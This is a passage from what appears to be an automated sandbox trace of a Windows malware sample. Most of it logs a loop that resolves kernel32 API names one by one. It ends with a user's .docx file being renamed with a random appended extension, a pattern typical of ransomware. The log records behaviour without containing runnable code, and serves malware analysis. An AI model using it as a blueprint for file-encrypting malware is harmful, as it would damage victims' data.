(lpString="CREATEDIRECTORYEXW") returned 18 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.066] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.066] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.067] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.067] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.067] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.067] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.067] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.067] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.067] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.067] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.067] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.067] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.067] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.067] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.067] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.067] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.067] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.067] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.067] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.067] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.068] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.068] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.068] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.068] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.068] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.068] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.068] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.068] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.068] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.068] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.068] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.068] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.068] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.068] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.068] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.068] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.068] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.068] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.068] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.069] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.069] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.069] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.069] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.069] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.069] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.069] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.069] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.069] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.069] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.069] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.069] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.069] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.069] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.069] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.069] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.069] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.069] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.069] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.070] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.070] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.070] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.070] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.070] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.070] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.070] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.070] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.070] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.070] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.070] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.070] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.070] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.070] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.070] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.070] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.070] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.070] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.070] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.071] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.071] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.071] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.071] lstrlenA (lpString="DELETEATOM") returned 10 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.071] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.071] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.071] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.071] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.071] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.071] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.071] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.071] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.071] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.071] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.071] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.071] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.071] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.071] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.071] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.071] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.072] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.072] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.072] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.072] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.072] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.072] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.072] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.072] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.072] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.072] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.072] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.072] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.072] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.072] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.072] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.072] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.072] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.072] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.072] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.072] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.073] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.073] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.073] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.073] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.073] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.073] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.073] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.073] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.073] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.073] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.073] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.073] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.073] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.073] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.073] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx") returned 75 [0084.073] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx.o39UsPc") returned 83 [0084.073] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\vjds-wsg_jzz.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 